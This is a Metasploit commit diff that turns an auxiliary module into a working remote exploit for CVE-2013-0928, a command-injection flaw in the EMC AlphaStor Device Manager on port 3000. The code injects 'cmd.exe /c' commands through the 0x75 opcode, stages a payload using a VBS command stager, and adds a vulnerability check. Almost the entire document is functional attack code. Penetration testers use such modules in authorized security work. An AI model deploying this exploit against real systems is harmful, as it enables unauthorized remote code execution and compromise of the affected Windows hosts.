Conver to exploit

bug/bundler_fix
jvazquez-r7 2014-09-05 14:47:33 -05:00
parent d4a8b7e00d
commit df278dd2dc
1 changed files with 98 additions and 33 deletions

View File

@ -1,56 +1,121 @@
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC AlphaStor Device Manager Opcode 0x75',
'Name' => 'EMC AlphaStor Device Manager Opcode 0x75 Command Injection',
'Description' => %q{
This module exploits a design flaw within the Device
Manager (rrobtd.exe) which listens on port 3000. When
parsing the 0x75 command, the process does not properly
filter user supplied input allowing for arbitrary command
injection.
This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75
command, the process does not properly filter user supplied input allowing for arbitrary
command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116
with Windows 2003 SP2 and Windows 2008 R2.
},
'Author' => [
'Preston Thornburn', # prestonthornburg@gmail.com
'Mohsan Farid', # faridms@gmail.com
'Brent Morris' # inkrypto@gmail.com
'Author' =>
[
'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery
'Preston Thornburn <prestonthornburg[at]gmail.com>', # msf module
'Mohsan Farid <faridms[at]gmail.com>', # msf module
'Brent Morris <inkrypto[at]gmail.com>', # msf module
'juan vazquez' # convert aux module into exploit
],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
['CVE', '2013-0928'],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-033/' ]
['ZDI', '13-033']
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Targets' =>
[
[ 'EMC AlphaStor 4.0 < build 800 / Windows Universal', {} ]
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 18 2013'))
register_options(
[
OptString.new('CMD', [ false, 'The OS command to execute', 'calc.exe']),
Opt::RPORT(3000)
], self.class )
end
def run
connect
padding = Rex::Text.rand_text_alpha_upper(512)
packet = "\x75~ mminfo &cmd.exe /c #{datastore['CMD']} #{padding}"
print_status("Sending command \'#{datastore['CMD']}\' to the remote host...")
sock.put(packet)
res = sock.get_once
if res
print_status("#{Rex::Text.to_hex_dump(res)}")
def check
packet = "\x75~ mminfo & #{rand_text_alpha(512)}"
res = send_packet(packet)
if res && res =~ /Could not fork command/
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Unknown
end
def exploit
execute_cmdstager({ :linemax => 487 })
end
def execute_command(cmd, opts)
padding = rand_text_alpha_upper(489 - cmd.length)
packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"# #{padding}"
connect
sock.put(packet)
begin
sock.get_once
rescue EOFError
fail_with(Failure::Unknown, "Failed to deploy CMD Stager")
end
disconnect
end
def execute_cmdstager_begin(opts)
if flavor =~ /vbs/ && self.decoder =~ /vbs_b64/
cmd_list.each do |cmd|
cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\")")
end
end
end
def send_packet(packet)
connect
sock.put(packet)
begin
meta_data = sock.get_once(8)
rescue EOFError
meta_data = nil
end
unless meta_data
disconnect
return nil
end
code, length = meta_data.unpack("N*")
unless code == 1
disconnect
return nil
end
begin
data = sock.get_once(length)
rescue EOFError
data = nil
ensure
disconnect
end
data
end
end